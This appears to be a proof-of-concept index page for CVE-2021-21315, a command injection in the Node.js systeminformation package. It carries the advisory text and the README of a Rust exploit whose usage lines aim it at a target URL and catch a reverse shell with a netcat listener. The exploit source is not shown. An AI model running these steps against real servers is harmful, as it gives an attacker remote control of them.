
CVE-2021-21315 PoC — Command Injection Vulnerability

Source
Associated Vulnerability
Title: Command Injection Vulnerability (CVE-2021-21315)
Description: The System Information Library for Node.JS (npm package "systeminformation") is an open source collection of functions to retrieve detailed hardware, system and OS information. In systeminformation before version 5.3.1 there is a command injection vulnerability. The problem was fixed in version 5.3.1. As a workaround instead of upgrading, check or sanitize the service parameters that are passed to si.inetLatency(), si.inetChecksite(), si.services(), si.processLoad() and similar functions: allow only strings and reject any arrays. String sanitization works as expected; the bypass is in how array-valued parameters are handled.
Description
A Rust noob tried to write a simple exploit in Rust.
Readme
# CVE-2021-21315 exploit code written in Rust

I'm a Rust noob, so this code was part of my Rust practice.

Yes!! Let's get the reverse shell!!

[!] For education or research only

# Build
  ```
  cargo build
  
  ```

# Usage

  ```
  ./exploit <targetURL/path/of/api> <LHOST> <LPORT>
  
  ./exploit http://target.com/api/osinfo?param 172.17.2.1 1234   
  ```
  
# Netcat is needed as a listener to catch the reverse shell
  ```
  
  nc -nlvp <lport>
  nc -nlvp 1234
  ```
  
  
File Snapshot

  ```
  [4.0K]  /data/pocs/ac97714cb3d814b0c8d5e6cae881b1210b26b19c
  ├── [ 273]  Cargo.toml
  ├── [ 560]  README.md
  └── [4.0K]  src
      └── [4.3K]  main.rs

  1 directory, 3 files
  ```